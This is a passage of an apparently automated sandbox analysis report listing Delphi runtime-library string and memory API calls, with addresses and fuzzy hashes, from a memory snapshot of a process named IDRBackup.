                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(00000000), ref: 50008D06
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 50008D1C
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(00000000), ref: 50008D2C
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 50008D3E
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 50008D4C
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120 ref: 50008D5C
                                                                                                  • API ID: System@@$Asg$qqrpvpxv$Move$qqrpxvpviSystem@$AnsiString$qqrius$Clr$qqrpvFreeMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 2313995952-0
                                                                                                  • Opcode ID: 936d8e47756e1243cb644d74a7489a6b21377997ac42361d4549fc5c609b8712
                                                                                                  • Instruction ID: 904c7c465a019645a902773b85c2849f7ea8bb55d576d4d16d3aa3ff9e88d0e0
                                                                                                  • Opcode Fuzzy Hash: 936d8e47756e1243cb644d74a7489a6b21377997ac42361d4549fc5c609b8712
                                                                                                  • Instruction Fuzzy Hash: 2B2165247051908BB754E71DD47192DF3F6BFE42407E4872BA6C4C7269DAB0DC818795
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500156E2), ref: 50015657
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500156E2), ref: 5001567F
                                                                                                  • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500156E2), ref: 5001569F
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500156E2), ref: 500156AB
                                                                                                  • @Sysutils@AnsiStrIComp$qqrpbt1.RTL120(00000000,500156E2), ref: 500156B7
                                                                                                  • API ID: System@Unicode$AnsiStringSystem@@$FromStr$qqrr20Stringx27System@%T$us$i0$%$InternalSysutils@$ByteChar$qqrx20Comp$qqrpbt1StringiType$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1446078087-0
                                                                                                  • Opcode ID: c5b83aefb23b3358bd06b18d679ca1007ac45f940c9c0406256258f96d7ac833
                                                                                                  • Instruction ID: beebbf29126e9d6e6507f71e1fa188fd936efd99e5be5d72eda28bad75657d21
                                                                                                  • Opcode Fuzzy Hash: c5b83aefb23b3358bd06b18d679ca1007ac45f940c9c0406256258f96d7ac833
                                                                                                  • Instruction Fuzzy Hash: 10215C30A0138ADFEF01DEB8DD9299DB7F5EF54201F904675A5409B265EB70DE85CA80
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500159A6), ref: 5001591B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500159A6), ref: 50015943
                                                                                                  • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500159A6), ref: 50015963
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500159A6), ref: 5001596F
                                                                                                  • @Sysutils@AnsiStrComp$qqrpbt1.RTL120(00000000,500159A6), ref: 5001597B
                                                                                                  • API ID: System@Unicode$AnsiStringSystem@@$FromStr$qqrr20Stringx27System@%T$us$i0$%$InternalSysutils@$ByteChar$qqrx20Comp$qqrpbt1StringiType$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1446078087-0
                                                                                                  • Opcode ID: 967e1a292ced734fea3fda5a5ef9006a9914c61bdb3ab0efd8a449f196f86bfa
                                                                                                  • Instruction ID: 972cb8add0711401713003887be376873cbf6b1675d33c83f3af55f82446fe10
                                                                                                  • Opcode Fuzzy Hash: 967e1a292ced734fea3fda5a5ef9006a9914c61bdb3ab0efd8a449f196f86bfa
                                                                                                  • Instruction Fuzzy Hash: 87219D30A0028ADFDF01DFB9DD8169DB7F5EF45211F504276E6009B255EB30DE82D642
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500155FB), ref: 50015563
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500155FB), ref: 50015582
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500155FB), ref: 500155AA
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,500155FB), ref: 500155C4
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,500155FB), ref: 500155D3
                                                                                                  • API ID: String$System@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal$Compare
                                                                                                  • String ID:
                                                                                                  • API String ID: 1952152088-0
                                                                                                  • Opcode ID: 49bd338da330a834a7d5b6809eacd117c69c76319b46f620415589b967403da5
                                                                                                  • Instruction ID: 8a79f3fe02d8f7039cd64eb97ab1fc8fe1bf3bea09e212b9e8f8072deb91f6bc
                                                                                                  • Opcode Fuzzy Hash: 49bd338da330a834a7d5b6809eacd117c69c76319b46f620415589b967403da5
                                                                                                  • Instruction Fuzzy Hash: 45216F70610685EFEB11DEB8DDA299EB7FAEF44240F904662E600EB291E770DE81D650
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0C8
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0D2
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0EF
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A117
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A12B
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A135
                                                                                                  • CompareStringW.KERNEL32(00000400,00000000,00000000,?,00000000,?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?), ref: 5001A142
                                                                                                  • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 2845561448-0
                                                                                                  • Opcode ID: a637fd93928d4bcc59d4fbf31d7dd1fda35c7064787cfb8b0e7d3fb8d7a31359
                                                                                                  • Instruction ID: 557e5c510faaf08c59fda0598d3fc89e05443d392f4ccd520a77b62b8c30d619
                                                                                                  • Opcode Fuzzy Hash: a637fd93928d4bcc59d4fbf31d7dd1fda35c7064787cfb8b0e7d3fb8d7a31359
                                                                                                  • Instruction Fuzzy Hash: 2F219331B003A5ABEF11DAB4DC52A5AB7F8EF49200F514272EA00E7246E770EE85C690
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A268
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A272
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A28F
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2B7
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2CB
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2D5
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2E2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A238), ref: 5001A1C0
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A238), ref: 5001A1E8
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A238), ref: 5001A1FC
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A238), ref: 5001A206
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001A238), ref: 5001A213
                                                                                                  APIs
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AA8
                                                                                                    • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                    • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AC1
                                                                                                    • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AC9
                                                                                                    • Part of subcall function 5001B48C: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120 ref: 5001B497
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AE1
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AE9
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016B07
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016B0F
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4E2
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4F4
                                                                                                    • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                    • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                    • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4FD
                                                                                                  • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D508
                                                                                                    • Part of subcall function 5000CE0C: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,?,5000D50D,?,00000000,5000D54A), ref: 5000CE34
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D519
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D525
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D52F
                                                                                                  APIs
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B31F
                                                                                                  • @System@@WStrAsg$qqrr17System@WideStringx17System@WideString.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B336
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B34D
                                                                                                  • @System@@CopyArray$qqrv.RTL120(?,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B386
                                                                                                  • @System@@CopyRecord$qqrv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B39A
                                                                                                  • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B3B5
                                                                                                  • @System@@DynArrayAsg$qqrv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B3CB
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 50027BD1
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027CD0), ref: 50027BFE
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027CD0), ref: 50027C38
                                                                                                  • @Sysutils@NextCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027CD0), ref: 50027C55
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027CD0), ref: 50027C8D
                                                                                                  • @Sysutils@NextCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027CD0), ref: 50027CA8
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50027CD7), ref: 50027CCA
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B4C0
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B4DF
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5000B53E), ref: 5000B4F5
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B47B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B512
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%Unicode$Internal$Move$qqrpxvpvi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2269240621-0
                                                                                                  • Opcode ID: 07a4e3b2a30b5038fec9cdcacff2e7d97685f54e4cb4140f115b55e76aca54ed
                                                                                                  • Instruction ID: ab6cb9ca280b5cfd23ec245c9f52380a76360824adbb00bdbbb02a50cc25d4fa
                                                                                                  • Opcode Fuzzy Hash: 07a4e3b2a30b5038fec9cdcacff2e7d97685f54e4cb4140f115b55e76aca54ed
                                                                                                  • Instruction Fuzzy Hash: 11318E30700689DBBB11EFA8DAA266DB3F8EF49300BA046B5E601D7256E7B4DF40D750
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                  • @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Char$qqrx20Scan$qqrpxbbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3324498720-0
                                                                                                  • Opcode ID: bf26a2b97ca58175508d886ed96bf389f4343cc66bbe0e155038a7790a10b8fe
                                                                                                  • Instruction ID: e1cde9bc071b440c39512abc6ffcd83c64075ec29b59cb21d599069659e6d0c2
                                                                                                  • Opcode Fuzzy Hash: bf26a2b97ca58175508d886ed96bf389f4343cc66bbe0e155038a7790a10b8fe
                                                                                                  • Instruction Fuzzy Hash: 6621F530A046D9EFDB11CFA8DD6297DB3F8EF94620BA04266E90197255E734DE80D680
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B01
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,50015B90), ref: 50015B12
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50015B90), ref: 50015B19
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B38
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Char$qqrx20Length$qqrr20Stringi
                                                                                                  • String ID:
                                                                                                  • API String ID: 1537914859-0
                                                                                                  • Opcode ID: 1e13e7f021d760450b2d22ee9921c6ee7e773aeb530b874d90593081222a90d2
                                                                                                  • Instruction ID: c8b1f13dae7ebe80b3f85388a8d19f916493298cae09e507b059e2df6187fb7d
                                                                                                  • Opcode Fuzzy Hash: 1e13e7f021d760450b2d22ee9921c6ee7e773aeb530b874d90593081222a90d2
                                                                                                  • Instruction Fuzzy Hash: CF218030B0428ADFEB11DFB8DDD196AB3F9EF4820076042B6E601DB255E770DE81D644
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028602
                                                                                                  • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028622
                                                                                                    • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 5002776B
                                                                                                    • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277A2
                                                                                                    • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277D2
                                                                                                    • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277F8
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028648
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028651
                                                                                                  • @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 5002865B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@$ByteChar$qqrx20Scan$qqrpxbbStringiType$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 3411762798-0
                                                                                                  • Opcode ID: d35db2a1ea66179b42cdae8437c045958a1c07e860a6d77cbb9ac8bb00c72174
                                                                                                  • Instruction ID: a8f6eb758e1e06c8c1c440b87328b3b1e64a0ab06fc938b2605612978542ffee
                                                                                                  • Opcode Fuzzy Hash: d35db2a1ea66179b42cdae8437c045958a1c07e860a6d77cbb9ac8bb00c72174
                                                                                                  • Instruction Fuzzy Hash: 8621D234603286EF9F11CFA4F9468AD73F9EF54240B5146A6E900D7212D770DE02D790
                                                                                                  APIs
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500168EE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                    • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 5001690C
                                                                                                    • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016914
